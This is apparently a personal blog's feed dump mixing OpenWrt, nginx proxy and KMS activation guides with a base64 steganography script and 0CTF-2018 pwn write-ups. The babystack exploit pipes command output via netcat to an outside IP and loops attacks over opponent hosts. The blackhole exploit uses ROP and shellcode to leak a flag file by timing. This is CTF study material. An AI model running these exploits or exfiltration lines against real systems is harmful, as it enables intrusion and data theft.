CONFIG_PATH="/root/sing-box/sing-box.json"
SING_BOX_PATH="/root/sing-box/sing-box"
WORKING_PATH="/root/sing-box"

start_service() {
    procd_open_instance
    procd_set_param command sh -c "$SING_BOX_PATH run -c $CONFIG_PATH -D $WORKING_PATH" 
    procd_set_param file $CONFIG_PATH # when file change, auto run /etc/init.d/your_service reload
    procd_set_param stdout 1 # forward stdout to logd
    procd_set_param stderr 1 # same for stderr
    procd_set_param pidfile /var/run/sing-box.pid
    procd_close_instance
}

随后为其设置可执行权限以及开机自启动：

chmod +x /etc/init.d/sing-box
service sing-box enable
service sing-box restart

]]> 2022 10 openwrt proxy pve linux t430 sing-box [0CTF-2018] writeup-list /ctf/0ctf-2018/writeup-list/ Reverse

PWN

babystack: [0CTF-2018] babystack

blackhole: [0CTF-2018] blackhole

Crypto

MISC

Web

]]> ctf writeup 0ctf-2018 [XDCTF-2017] writeup-list /ctf/xdctf-2017/writeup-list/ Reverse

destory : [XDCTF-2017] destory

Stealer : [XDCTF-2017] Stealer

PWN

easyeasy : [XDCTF-2017] easyeasy

Crypto

基础之Base64 : [XDCTF] 基础之Base64

MISC

Web

]]> ctf writeup xdctf-2017 Nginx 编译第三方动态模块 /linux/nginx/compile-nginx-dynamic-modules/ 最近尝试用 nginx 搭建某网站的反代, 但是 nginx 内置的功能无法替换 html 内的链接, 最后考虑用 nginx 的第三方模块 ngx_http_substitutions_filter_module 来实现链接替换的功能。

但是网上搜到的教程基本上都是下载模块源码和 nginx 源码, 然后重新编译一次 nginx, 十分的不方便。而且我服务器上为了避免炸依赖, 使用了 nginx 的官方镜像, 重新编译个 nginx 再挂载进 container 怎么想都太扭曲了, 查了一下文档发现 nginx 自从 1.9.11 以后就支持动态加载模块了, 不需要重新编译 nginx, 只需要将模块编译为 so 然后在 nginx 的配置文件中加载就行。

下载对应版本 nginx 源码

nginx 版本可用 nginx -v 查看

root@aliyun:/# nginx -v
nginx version: nginx/1.17.9

可以得知目前 docker 容器内的 nginx 版本为 1.17.9, 下载 nginx 源码以及模块源码并解压

wget https://github.com/nginx/nginx/archive/release-1.17.9.tar.gz
tar -xvf release-1.17.9.tar.gz

下载模块源码并配置模块

git clone https://github.com/yaoweibin/ngx_http_substitutions_filter_module.git

Nginx 模块源码中存在着 config 脚本文件, 静态模块和动态模块的配置文件时不同的。新格式的 config 脚本是同时兼容动态模块和静态模块的, 模块的 config脚本还是旧的格式, 则需要根据文档去转换。

有些模块是无法被配置为动态模块的。

新式配置脚本样例

ngx_addon_name=ngx_http_hello_world_module

if test -n "$ngx_module_link"; then
    ngx_module_type=HTTP
    ngx_module_name=ngx_http_hello_world_module
    ngx_module_srcs="$ngx_addon_dir/ngx_http_hello_world_module.c"

    . auto/module
else
    HTTP_MODULES="$HTTP_MODULES ngx_http_hello_world_module"
    NGX_ADDON_SRCS="$NGX_ADDON_SRCS $ngx_addon_dir/ngx_http_hello_world_module.c"
fi

旧式配置脚本样例

ngx_addon_name=ngx_http_response_module
HTTP_MODULES="$HTTP_MODULES ngx_http_response_module"
NGX_ADDON_SRCS="$NGX_ADDON_SRCS $ngx_addon_dir/ngx_http_response_module.c"

转换的方法见: https://www.nginx.com/resources/wiki/extending/converting/

本文提及的 ngx_http_substitutions_filter_module 使用的新式脚本, 因此可以直接被编译为动态模块无需配置。

编译模块

先安装编译时依赖的库（需要安装的库可能不止这些, 跟着报错找的）

sudo apt install make gcc zlib1g-dev libpcre3-dev libssl-dev

由于新版 nginx 目录结构的改版, 源码的目录结构和旧版本的不太一样:

configure 脚本从根目录移到了 auto 目录下

cd 进 nginx 源码目录后使用 --with-compat 和 --add-dynamic-module 参数来配置编译环境

关于参数 --with-compat 的文档很少, 只知道是一个兼容动态模块的参数

最后在邮件列表中发现了这个参数的解释：

http://mailman.nginx.org/pipermail/nginx-devel/2016-October/008920.html

总结一下就是, 加上这个参数后编译出的 nginx 可执行文件是兼容动态模块的, 至于编译动态模块为什么要加上这个参数就没找到相关解释了, 总之还是加上

./auto/configure --with-compat --add-dynamic-module=../ngx_http_substitutions_filter_module
make modules

编译出来的模块在 objs\ngx_http_subs_filter_module.so

根据官方文档来讲, 只需要添加两个参数就可以编译动态模块了。但是, 实际环境中 nginx 的编译参数可能是很复杂的, 如果发现编译出来的模块无法正常加载, 可以考虑用 nginx -V 查看编译 nginx 时使用的参数, 将参数加入 configure 命令后再次尝试编译加载模块

加载并使用模块

我使用的 nginx docker 镜像为 nginx 官方的镜像, 模块被存放在 /usr/lib/nginx/modules 下, 将模块挂载入 container 后, 修改 nginx 配置文件 /etc/nginx/nginx.conf, 加入

load_module modules/ngx_http_subs_filter_module.so;

重载容器中的 nginx 配置即可使用新模块

修改完配置文件后可以在 maps 中看到 so 已被加载

参考资料

动态模块: https://docs.nginx.com/nginx/admin-guide/dynamic-modules/dynamic-modules/
编译动态模: https://www.nginx.com/blog/compiling-dynamic-modules-nginx-plus/
转换静态模块为动态模块: https://www.nginx.com/resources/wiki/extending/converting/

]]> linux nginx Nginx 配置谷歌镜像站 /linux/nginx/configure-nginx-google-mirror/ 以前一直以为用 nginx 配谷歌以及谷歌学术的镜像站会很麻烦, 就一直没去配, 直到昨天 evi0s 给我发了个 nginx module 我才知道有人已经造好了轮子

只需要给 nginx 安装 ngx_http_google_filter_module 模块即可

个人感觉官方给的教程实在是太麻烦了, 而且比较老旧还需要重编译 nginx, 我 vps 上的 nginx 直接使用的 nginx 官方容器, 因此决定将该模块及其依赖项编译为动态模块, 挂载进容器内动态加载

编译过程和 https://blog.plusls.com/linux/nginx/compile-nginx-dynamic-modules/ 基本一致

下载 nginx 以及模块源码

目前 nginx 容器的 nginx 版本为 1.17.9, 编译时使用了 ngx_http_google_filter_module 的 dev 分支

官方文档提及了该模块依赖 ngx_http_substitutions_filter_module, 因此也需要将 ngx_http_substitutions_filter_module 编译为动态模块

wget https://github.com/nginx/nginx/archive/release-1.17.9.tar.gz
tar -xvf release-1.17.9.tar.gz
git clone https://github.com/yaoweibin/ngx_http_substitutions_filter_module.git
git clone -b dev https://github.com/cuber/ngx_http_google_filter_module

源码下载完后目录结构如下:

plusls@us1:~/nginx-source$ tree -L 2
.
├── nginx-release-1.17.9
│   ├── auto
│   ├── conf
│   ├── contrib
│   ├── docs
│   ├── Makefile
│   ├── misc
│   ├── objs
│   └── src
├── ngx_http_google_filter_module
│   ├── config
│   ├── LICENSE
│   ├── README.md
│   ├── README.zh-CN.md
│   └── src
├── ngx_http_substitutions_filter_module
│   ├── CHANGES
│   ├── config
│   ├── doc
│   ├── ngx_http_subs_filter_module.c
│   ├── README
│   ├── test
│   └── util
└── release-1.17.9.tar.gz

14 directories, 10 files

安装依赖项

可以自行下载源码安装, Debian 可以直接 apt 安装

sudo apt install make gcc zlib1g-dev libpcre3-dev libssl-dev

源码下载 (可选)

wget "https://www.openssl.org/source/openssl-1.1.1c.tar.gz"
wget "http://ftp.cs.stanford.edu/pub/exim/pcre/pcre-8.38.tar.gz"
wget "http://zlib.net/fossils/zlib-1.2.8.tar.gz"

上面给出的依赖版本可能有点老旧, 可自行去库的官网下载最新版

在编译新版 nginx 时如果使用 openssl 1.0.1 会编译报错, 同时 openssl 1.1.1e 貌似存在 bug 会导致模块工作异常 (evi0s 测出来的), 编译 openssl 时需要安装 g++

编译模块

进入 nginx 源码目录后, 执行 configure 脚本

./auto/configure --with-compat \
                 --add-dynamic-module=../ngx_http_substitutions_filter_module \
                 --add-dynamic-module=../ngx_http_google_filter_module \
                 --with-http_ssl_module
make modules

关于参数 --with-http_ssl_module 在模块的文档中并没有明确书写需要添加该参数, 不加该参数是也能编译成功, 但是模块无法正常处理 ssl 流量

这是由于该模块在源码中用宏判断了一下当前的编译参数, 如果没加 --with-http_ssl_module 参数则不会启用 ssl 相关功能

只有启用了后相关功能才能正常工作, 不然会 501 或者 302 301 重定向次数过多

编译完成后 ngx_http_google_filter_module.so 和 ngx_http_subs_filter_module.so 生成在 objs 目录下

plusls@us1:~/nginx-source/nginx-release-1.17.9$ ls -l objs
total 556
drwxrwxr-x 4 plusls plusls   4096 Mar 27 13:47 addon
-rw-rw-r-- 1 plusls plusls  17601 Mar 27 13:47 autoconf.err
-rw-rw-r-- 1 plusls plusls  45379 Mar 27 13:47 Makefile
-rw-rw-r-- 1 plusls plusls   7823 Mar 27 13:47 ngx_auto_config.h
-rw-rw-r-- 1 plusls plusls    657 Mar 27 13:47 ngx_auto_headers.h
-rw-rw-r-- 1 plusls plusls    303 Mar 27 13:47 ngx_http_google_filter_module_modules.c
-rw-rw-r-- 1 plusls plusls  44688 Mar 27 13:48 ngx_http_google_filter_module_modules.o
-rwxrwxr-x 1 plusls plusls 258640 Mar 27 13:48 ngx_http_google_filter_module.so
-rw-rw-r-- 1 plusls plusls    367 Mar 27 13:47 ngx_http_subs_filter_module_modules.c
-rw-rw-r-- 1 plusls plusls  44792 Mar 27 13:48 ngx_http_subs_filter_module_modules.o
-rwxrwxr-x 1 plusls plusls 107880 Mar 27 13:48 ngx_http_subs_filter_module.so
-rw-rw-r-- 1 plusls plusls   6043 Mar 27 13:47 ngx_modules.c
drwxrwxr-x 9 plusls plusls   4096 Mar 27 13:47 src
plusls@us1:~/nginx-source/nginx-release-1.17.9$

配置 nginx

编译完成后将生成的模块拷贝到响应的目录下

我在服务器上使用的 nginx 容器目录结构如下:

plusls@us1:~/nginx$ tree
.
├── auth
│   └── default.htpasswd
├── conf.d
│   ├── google.conf
│   └── v2ray.conf
├── docker-compose.yml
├── log
│   └── .
├── modules
│   ├── ngx_http_google_filter_module.so
│   └── ngx_http_subs_filter_module.so
├── nginx
├── nginx.conf
├── ssl
│   ├── google
│   │   ├── cert.pem
│   │   └── key.pem
│   └── v2ray
│       ├── cert.pem
│       └── key.pem
└── www
    └── v2ray
        └── index.html

9 directories, 15 files

相关模块已被放入 modules 目录中

将模块挂载进容器

ngx_http_subs_filter_module 和 ngx_http_google_filter_module 已经使用 docker-compose 挂载到容器中的 /usr/lib/nginx/modules 下

docker-compose 配置为

version: "3.4"
services:
  nginx:
    image: nginx:1.17.9
    container_name: docker-nginx
    restart: always
    network_mode: host
    volumes:
      - ./conf.d:/etc/nginx/conf.d
      - ./log:/log
      - ./ssl:/ssl
      - ./www:/www
      - ./auth:/auth
      - ./nginx.conf:/etc/nginx/nginx.conf
      - ./modules/ngx_http_subs_filter_module.so:/usr/lib/nginx/modules/ngx_http_subs_filter_module.so
      - ./modules/ngx_http_google_filter_module.so:/usr/lib/nginx/modules/ngx_http_google_filter_module.so

加载模块

为了加载模块需要在 nginx.conf 中加入相关语句

load_module modules/ngx_http_subs_filter_module.so;
load_module modules/ngx_http_google_filter_module.so;

配置反代

在 docker-compose 中 conf.d 目录已被挂载到 /etc/nginx/conf.d, 因此配置文件放在该目录下即可

google.conf

upstream scholar.google.com {
    server [2404:6800:4008:0c06::0be]:443 weight=3;
}
server {
    listen       80;
    server_name  google.plusls.com;
    # enforce https
    return 301 https://$server_name$request_uri;
}
server {
    listen 443 ssl http2;
    server_name google.plusls.com;
    ssl_certificate /ssl/google/cert.pem;
    ssl_certificate_key /ssl/google/key.pem;
    ssl_ciphers EECDH+CHACHA20:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;
    resolver 8.8.8.8;
    location / {
        auth_basic 'Private Service';
        auth_basic_user_file /auth/default.htpasswd;
        google on;
        google_scholar on;
    }
}

80 端口接到数据后会将请求重定向到 https 协议所在的 443 端口。

下面还添加了 auth_basic 来避免该服务被滥用, 只有知道用户名和密码的用户才能使用谷歌反代

htpasswd 文件可用命令 htpasswd 生成

该程序包含在 apache2-utils 中, apt install 即可使用

plusls@us1:~/nginx$ sudo apt install apache2-utils
plusls@us1:~/nginx$ htpasswd -c ./default.htpasswd myusername
New password:
Re-type new password:
Adding password for user myusername

google on 和 google_scholar on 指开启 google 反代以及 google scholar 的反代

由于大多数 vps 的 ip 段已经被 google scholar 拉黑了, 因此要添加 upstream, 让 google scholar 使用 ipv6 连接来绕过谷歌的封锁。

证书的话用 v2ctl 随手签一个就好, 然后套个 cloudflare 的 cdn, 免得被日。

./v2ctl cert --domain=google.plusls.com --name=plusls-google --org=plusls --file=google

这会在本地生成 google_cert.pem 和 google_key.pem, 分别是证书和私钥

效果

配置完成后 docker-compose up -d 即可启动反代服务器

进入 https://google.plusls.com/scholar 可以看到要求验证

验证通过后可以正常使用

Google:

Google scholar:

]]> linux nginx base64详解 /technical/misc/base64/ 原理

众所周知，任何数据在内存中都是以Byte为单位进行存储的，每个Byte包含了8个二进制位，因此本文不区分二进制数据与文本，而是将其作为一个整体进行讨论。

编码

base64编码包括以下几个步骤

将每个BYTE转为8位二进制
若二进制位不是6的倍数则在其后面补0直到其变为6的倍数
将每6个二进制位作为整体转换为10进制
通过查表将十进制转为字符
若转出的长度不为4的倍数，则在其后补’=’

注: 转换表见附录

若是以编码 CNSS 为例，则整个过程为

base64encode

解码

base64解码包括以下几个步骤

将除了 = 以外的别的字符通过查表转为十进制数字
将十进制数字转为6位二进制
删去等号个数*2位二进制
将二进制转为BYTE

黑魔法：base64隐写

由上面的过程可以看出，在编码的过程中补上了一些0，若是补充的不是0，而是一些有意义的数据，那么就可以在不改变解码结果的情况下，添加额外的数据

脚本

下面为python3的脚本，包括生成隐写，解隐写

目前已加入ctf大礼包 : ctf大礼包

import base64

def get_base64_diff_value(s1, s2):
    """get base64 diff value"""
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    for i in range(len(s2)):
        if s1[i] != s2[i]:
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
    return 0

def solve_stego(stego_str_list):
    '''stego_str_list str列表'''
    bin_str = ''
    for stego_str in stego_str_list:
        stego_str = stego_str.replace('\n', '')
        norm_str = base64.b64encode(base64.b64decode(stego_str)).decode()
        diff = get_base64_diff_value(stego_str, norm_str)
        pads_num = stego_str.count('=')
        bin_str += bin(diff)[2:].zfill(pads_num * 2)


    ret = b''
    for i in range(0, len(bin_str), 8):
        ret += int(bin_str[i:i + 8], 2).to_bytes(1, 'little')
    return ret

def to_stego(normal_data, stego_data, stego_bit_len=4):
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    bin_str = ''
    for each in stego_data:
        bin_str += bin(each)[2:].zfill(8)
    line_len = len(normal_data) // (len(bin_str) // stego_bit_len)
    if stego_bit_len == 4:
        line_len = line_len - ((line_len % 3 - 1) + 3) % 3 # 令 line_len % 3 = 1 右边建立了一个 0 1 2 -> 2 0 1 的映射
    else:
        line_len = line_len - ((line_len % 3 - 2) + 3) % 3 # 令 line_len % 3 = 2 右边建立了一个 0 1 2 -> 1 2 0 的映射
    if line_len <= 0:
        return []
    ret = []
    index = 0
    while True:
        if index >= len(normal_data):
            break
        encode_str = base64.b64encode(normal_data[index:index + line_len]).decode()
        # print('index=%d bin_str=%s' % (index, bin_str))
        index += line_len
        # print(encode_str)
        if bin_str != '':
            if stego_bit_len == 4:
                now_encode = bin_str[:4]
                bin_str = bin_str[4:]
            tmp_list = encode_str.rpartition(encode_str[-1 * (stego_bit_len // 2 + 1)])
            encode_str = tmp_list[0] + base64chars[base64chars.index(tmp_list[1]) + int(now_encode, 2)] + tmp_list[2]
        ret.append(encode_str)
    return ret


def main():
    with open('2.txt', 'rb') as fp:
        file_lines = fp.readlines()
    stego_str_list = []
    for each in file_lines:
        stego_str_list.append(each.decode().replace('\n', ''))
    print(solve_stego(stego_str_list))

    l = to_stego(b'123456789012345678901234567890123456', b'cnss', 4)
    print(l)
    print(solve_stego(l))

if __name__ == '__main__':
    main()

附录

转换表

转换表分为几种形式

表格

转换表:

索引	对应字符	索引	对应字符	索引	对应字符	索引	对应字符
0	A	17	R	34	i	51	z
1	B	18	S	35	j	52	0
2	C	19	T	36	k	53	1
3	D	20	U	37	l	54	2
4	E	21	V	38	m	55	3
5	F	22	W	39	n	56	4
6	G	23	X	40	o	57	5
7	H	24	Y	41	p	58	6
8	I	25	Z	42	q	59	7
9	J	26	a	43	r	60	8
10	K	27	b	44	s	61	9
11	L	28	c	45	t	62	+
12	M	29	d	46	u	63	/
13	N	30	e	47	v
14	O	31	f	48	w
15	P	32	g	49	x
16	Q	33	h	50	y

文本

以下为python语法

table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

引用

本文参考自

百度百科 : base64
推酷 : ZJPCCTF：我未见过的base64隐写

附件

base64编码过程表: base64.xlsx

]]> technical misc 自建kms服务器 /windows/kms/configure-kms-server/ 对于激活windows，网上有各式各样的激活工具，你电的正版windows和office激活服务其实就是一个仅限校内访问的kms。考虑到以后会毕业以及不在校园网中不方便激活，决定自建kms

本文将使用py-kms搭建kms激活服务器，方便激活

准备

确保机器安装了docker

下载代码

git clone https://github.com/SystemRage/py-kms.git

构建并运行镜像

cd py-kms/docker/docker-py3-kms
./build-py3-kms.sh
./run-py3-kms.sh

该容器会占用机器的1688和8080端口，要配置反代的话可以自行修改脚本

附录

kms服务器使用说明

]]> windows kms kms服务器使用说明 /windows/kms/use-kms-server/ 由于嫌弃你电的kms, 自己搭了个kms server, 可以激活 windows 7, 8, 8.1, 10, 以及 office 2010, 2013, 2016

激活服务器地址为 kms.plusls.cn

激活office

用管理员权限打开 cmd 后，输入

rem 切换到office安装目录
cd "C:\Program Files\Microsoft Office\Office16"
rem 设置 kms 服务器
cscript ospp.vbs /sethst:kms.plusls.cn
rem 激活
cscript ospp.vbs /act
rem 查看激活状态
cscript ospp.vbs /dstatus

激活windows

用管理员权限打开 cmd 后，输入

rem 切换到 windows 目录
cd "C:\windows\system32"
rem 设置 kms 服务器
cscript slmgr.vbs /skms kms.plusls.cn
rem 激活
cscript slmgr.vbs /ato
rem 查看激活状态
cscript slmgr.vbs /xpr

附录

如何搭建kms激活服务器

]]> windows kms [0CTF-2018] babystack /ctf/0ctf-2018/pwn/babystack/ 分析

这题，开门有惊喜

overflow

整个题就一个read，也只有这有一个溢出点，然后，啥都没了。

emmmmm，同学，你听说过安利吗（雾）

不对，你听说过got表吗，好的，听说过

那，同学你听说过解析解析got表的函数嘛，就是把动态链接库的函数地址写到got表里面的家伙

emmmmmm，这啥啊，咋回事啊（黑人问号.jpg）

那么，ret2_dl_runtime_resolve 了解一下吧

好的，你已经了解了ret2_dl_runtime_resolve，那么这个题就变得十分简单了。

首先使用read在bss段上伪造一个ELF Symbol Table，然后调用plt[0]去解析它，就可以让它执行system啦！

就这样，很轻松的写出了exp，这题很简单嘛。

这时，翻看了一下压缩包，发现了一个奇怪的东西

咦，这个pow.py是什么东东，下面这个函数是啥啊

def exec_serv(name, payload):
    p = subprocess.Popen(name, stdin=subprocess.PIPE, stdout=file('/dev/null','w'), stderr=subprocess.STDOUT)
    p.stdin.write(payload)
    p.wait()

换句话来讲，这题是没有回显的，把payload发过去后，对面程序就不鸟你了

其实只需要在自己的服务器上

nc -l 5000

然后再exp中让system执行

cat flag|nc xxx.xxx.xxx.xxx 5000

就可以把flag传出来啦

exp

#!/usr/bin/env python2
# -*- coding: utf-8 -*- #
from pwn import *
import time
import os
from hashlib import sha256

# 调试模式 会使用gdb联调
DEBUG = 0

# 啰嗦模式
VERBOSE = 1

# 0 local 1 remote 2 attack
MODE = 1

# 程序名
PROGRAM_NAME = './babystack'

# libc
REMOTE_LIBC = False

# 地址
IP = '202.120.7.202'

PORT = 6666
#IP = '127.0.0.1'
#PORT = 17001

# gdb调试配置 根据机器更改
# context.terminal = ['tmux', 'splitw', '-h']
context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']
context.arch = 'i386'

# 是否开启 aslr
context.aslr = True


# export LD_LIBRARY_PATH=/home/plusls/Desktop/kanxuectf/4-BPG-club
# LD_PRELOAD
# socat tcp-l:8888,reuseaddr,fork system:LD_PRELOAD=./libc.so.6 ./club

# 地址 程序常量
system_offset = 0
_IO_list_all_offset = 0
__malloc_hook_offset = 0
one_gadget_offset = 0



def set_breakpoint(breakpoint_list, pie=False):
    '''生成设置断点的命令'''
    ret = ''
    offset = 0
    if pie is True:
        if context.aslr is True:
            return ''
        if context.arch == 'amd64': # 64位下gdb关闭aslr后基址为 0x555555554000
            offset = 0x555555554000
        elif context.arch == 'i386': # 32位为0x56555000
            offset = 0x56555000
    for breakpoint in breakpoint_list:
        ret += 'b *%d\n' % (breakpoint + offset)
    return ret


def get_shell(ip='', port=0):
    # 设置断点
    
    breakpoint = set_breakpoint([0x08048456], pie=False)
    #breakpoint = ''
    gdbscript = breakpoint + 'c\n'
    if VERBOSE:
        context.log_level = 'debug'

    global system_offset, _IO_list_all_offset, __malloc_hook_offset, one_gadget_offset
    if REMOTE_LIBC:
        env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.remote")}
        
        system_offset = 0x45390
        _IO_list_all_offset = 0x3c5520
        __malloc_hook_offset = 0x3c4b10
        __free_hook_offset = 0x3c67a8
        one_gadget_offset =0x04523E
        libc_ptr_offset = 0x3c4b31
        heap_ptr_offset = 0x240
        fastbin_0x70_offset = 0x30
        main_arena_offset = 0x3c4b20
    else:
        env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.local")}
        env = {}
        
        system_offset = 0x456a0
        _IO_list_all_offset = 0x3c2500
        __malloc_hook_offset = 0x3c1af0
        __free_hook_offset = 0x3c3788
        one_gadget_offset = 0x0F24CB
        libc_ptr_offset = 0x3c1b31
        heap_ptr_offset = 0x240
        main_arena_offset = 0x3c1b00
        fastbin_0x70_offset = 0x30
        



    if MODE == 0:
        if DEBUG:
            # debug
            program = gdb.debug((PROGRAM_NAME, ), gdbscript=gdbscript, env=env)
            # 等待输入后继续运行
            raw_input('')
            # gdb.attach(program)
        else:
            # 直接运行程序
            program = process((PROGRAM_NAME, ), env=env)
            sol = ''
    else:
        # 远程
        program = remote(ip, port)
        #program = process('./pow.py')
        
        chal = program.recvuntil('\n')[:-1]
        for i in xrange(0x100000000):
            if sha256(chal + p32(i)).digest().startswith('\0\0\0'):
                sol = p32(i)
                break
        #sol = 'fuck'
        program.send(sol)
        

    payload = ''    
    payload += (0x28+4) * 'a'
    payload += p32(0x08048300) # read
    payload += p32(0x0804843B) # 
    #payload += p32(0x080484E9) # pop 3 arg
    payload += p32(0) # fd
    payload += p32(0x0804A024) # buf
    payload += p32(40) # len

    l1 = len(payload)

    main_elf = ELF('./babystack')
    #payload += '/bin/sh'.ljust(8, '\x00') # 0x0804A024 -> 0x0804A02c
    payload += '/bin/sh'.ljust(8, '\x00') # 0x0804A024 -> 0x0804A02c
    
    #payload += 'fuck'.ljust(8, '\x00') # 0x0804A024 -> 0x0804A02c
    
    # fake ELF Symbol Table
    payload += p32(0x1e10) + p32(0) + p32(0) + p32(0x12) # [offset, 0, 0, 0x12] offset = 0x0804A02c + 16 - 0x804822C = 0x1e10
    payload += 'system\x00\x00'
    payload += p32(0x804A020) + p32(0x1e607) # [addr, offset] offset = ((0x0804A02c - 0x80481CC) << 4) + 7 = 0x1e607
    #program.sendline(payload)

    l2 = len(payload) - l1

    # plt offset = hex(0x0804A02c + 16 + 8 - 0x80482B0)=0x1d94

    #raw_input()
    payload += (0x28+4) * 'a'
    payload += p32(0x080482F0) # plt 0
    payload += p32(0x1d94) # fd
    payload += p32(0x0804843B) #
    payload += p32(0x0804A024) #  binsh
    payload += 'a'*4
    #payload += 'curl baidu.com && exit\n'
   # payload += 'ls -al|nc 139.199.155.42 10086\n'
    payload += 'pwd|nc 139.199.155.42 10086\n'
    
    
    

    l3 = len(payload) - l2 - l1
    log.info('%d %d %d 0x%x' % (l1, l2, l3, len(payload)))
    
    log.info(repr(payload.ljust(0x100, '\n')))
    payload = payload.ljust(0x100, '\n')
    fp = open('out.data', 'wb')
    fp.write(payload)
    fp.close()
    program.sendline(payload)
    return program

def attack(sleep_time=10):
    # 打全场 线下赛使用
    ip_list = ['172.16.20.4', '172.16.20.5',
               '172.16.20.7', '172.16.20.9', '172.16.20.11']
    # ip_list = ['127.0.0.1']
    while True:
        for ip in ip_list:
            try:
                program = get_shell(ip=ip, port=2111)
                program.sendline('cd /home/tsctf/flag')
                program.sendline('cat flag')
                flag = program.recvall(timeout=1)[-32:]
                log.info('flag=' + flag)
                #submit_flag(ip, '2', flag)
                program.close()
            except:
                print('FUCK')
        time.sleep(sleep_time)


def main():
    if MODE == 0:  # local
        program = get_shell()
        program.interactive()
    elif MODE == 1:  # remote
        program = get_shell(ip=IP, port=PORT)
        #program = get_shell(ip='127.0.0.1', port=17001)
        
        program.interactive()
    elif MODE == 2:  # attack
        attack(sleep_time=10)
    elif MODE == 3: # 取回二进制文件
        program = get_shell(ip=IP, port=PORT)
        program.recv(timeout=1)
        program.sendline('cat pwn2')
        program.sendline('exit')
        
        recv_data = program.recvall()
        fp = open('dump', 'wb')
        fp.write(recv_data)
        fp.close()



if __name__ == '__main__':
    main()

附录

附件： babystack.zip

]]> ctf 0ctf-2018 pwn [0CTF-2018] blackhole /ctf/0ctf-2018/pwn/blackhole/ 分析

日哦，一看这题，64位，只有一个read有溢出，syscall禁用了一堆，只留下 open，read,，mprotect,，exit，拿头做题。（懒得放图了，没啥意思）

难道又要将mprotect的地址解析出来去调用？？？

等等，这题有libc，为啥有libc呢

开了一晚上的脑洞后，惊讶的发现了一件事情：

alarm

最后1byte为0x80时，指向的是alarm，如果是0x85就是syscall！

只需调用read，覆写alarm的got表的最后1byte为0x85，就可以通过syscall调用mprotect了！

啥，x64不会调用3个参数的函数？init函数的那几个gadget了解一下

就这样很轻易的让bss段变成可执行的了。

可是，这题没有回显，考虑使用基于时间的盲注（滚啊！这是pwn题？？？）

就这样，没啥了

exp

#!/usr/bin/env python2
# -*- coding: utf-8 -*- #
from pwn import *
import time
import os
from hashlib import sha256

#context.log_level = 'debug'
context.arch = 'amd64'

def start_new_program():
    return process(('./blackhole', ))

def start_new_program():
    program = remote('202.120.7.203', 666)
    #program = process('./pow.py')
    chal = program.recvuntil('\n')[:-1]
    log.info(chal)
    #sol = p32(0)
    for i in xrange(0x100000000):
        #break
        if sha256(chal + p32(i)).hexdigest().startswith('00000'):
            sol = p32(i)
            break
    log.info(repr(sol))
    program.send(sol)
    return program


def fuckflag():
    # 设置断点
    # 可见字符 32--126
    flag = ''

    for i in range(55, 70):
        log.info('flag=' + flag)
        l = 32
        r = 126
        old = None
        new = None
        while True:
            mid = (l + r) // 2
            program = start_new_program()
            if guess(program, 1, i, mid): # if > mid
                l = mid + 1
            else:
                r = mid
            #program.interactive()
            program.close()
            old = new
            new = mid
            if old == new:
                flag += chr(old)
                break
        if flag[-1] == '}':
            break
    log.info('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
    log.info('flag=' + flag)

# sha256(chal + sol).hexdigest().startswith('00000')
    # fp = open('out.data', 'wb')
    # fp.write(payload)
    # fp.close()





def guess(program, op, n, ch):
    payload = guess_payload(op, n, ch)
    log.info('len=0x%x' % len(payload))
    payload = payload.ljust(0x8000 - 1, '\x00')
    #payload = ''.ljust(0x8000 - 1, '\x00')
    program.sendline(payload)
    sleep(0.5)
    opc1 = ['=', '>', '<']
    opc2 = ['!=', '<=', '>=']
    try:
        program.sendline('fuck!')
    except:
        log.info('flag[%d]%s%c' % (n, opc1[op], ch))
        return True
    log.info('flag[%d]%s%c' % (n, opc2[op], ch))
    return False

def guess_payload(op, n, ch):
    # 0 相等
    # 1 大于
    # 2 小于
    shellcode1 = asm(shellcraft.amd64.linux.open('flag'))
    shellcode1 += asm('''mov rbx, rax''')
    shellcode1 +=asm(shellcraft.amd64.linux.read('rbx', 0x601500, 70))
    shellcode2 = asm('''
    mov rax, 0x%x
    xor rbx, rbx
    mov bl, byte ptr [rax]
    ''' % (0x601500 + n, ))
    if op == 0:
        shellcode2 += asm('''
        fuck:
        cmp bl, 0x%x
        jnz fuck
        ''' % ch)
    elif op == 1:
        shellcode2 += asm('''
        fuck:
        cmp bl, 0x%x
        jng fuck
        ''' % ch)
    elif op == 2:
        shellcode2 += asm('''
        fuck:
        cmp bl, 0x%x
        jnl fuck
        ''' % ch)
    shellcode3 = asm(shellcraft.amd64.linux.exit(0))
    payload = make_shellcode(shellcode1 + shellcode2 + shellcode3)
    return payload


def make_shellcode(shellcode):
    '''
    remote libc
    read
    .text:00000000000DB6D0                 cmp     rax, 0FFFFFFFFFFFFF001h

    mprotect 0xE44D0
    '''
    # 0x00601040 alarm got
    # 0x0601048  read  got
    # read(0, 0x00601040, 1)  rdi, rsi, rdx
    #
    #0x0000000000400a53 : pop rdi ; ret

    # 初始时rdi=0 rbx=0
    payload1 = 'a'*0x20 + p64(1) #rbp=1
    # 0x400A4E pop r12; pop r13; pop r14; pop r15 ret;
    payload1 += p64(0x400A4c) #
    payload1 += p64(0x0601048) # r12
    payload1 += p64(1) # r13
    payload1 += p64(0x00601040) # r14 alarm got
    payload1 += p64(0) # r15
    payload1 += p64(0x00400A30) # mov rdx, r13; mov rsi, r14; mov rdx r15; call [r12 + rbx*8]
    payload1 += 'a'*8    # padding
    payload1 += p64(0) # rbx
    payload1 += p64(1) # rbp
    payload1 += p64(0x0601048) # r12
    payload1 += p64(0xa) # r13
    payload1 += p64(0x0601068) # r14 bss
    payload1 += p64(0) # r15
    payload1 += p64(0x04009A7) # overflow again
    payload1 = payload1.ljust(0x100, '\x00')


    payload2 = '\x85' # 覆盖alarm got最后为0x80 则指向 syscall


    payload3 = 'a'*0x20 + p64(1) #rbp=1
    payload3 += p64(0x00400A30) # mov rdx, r13; mov rsi, r14; mov rdx r15; call [r12 + rbx*8]
    payload3 += 'a'*8    # padding
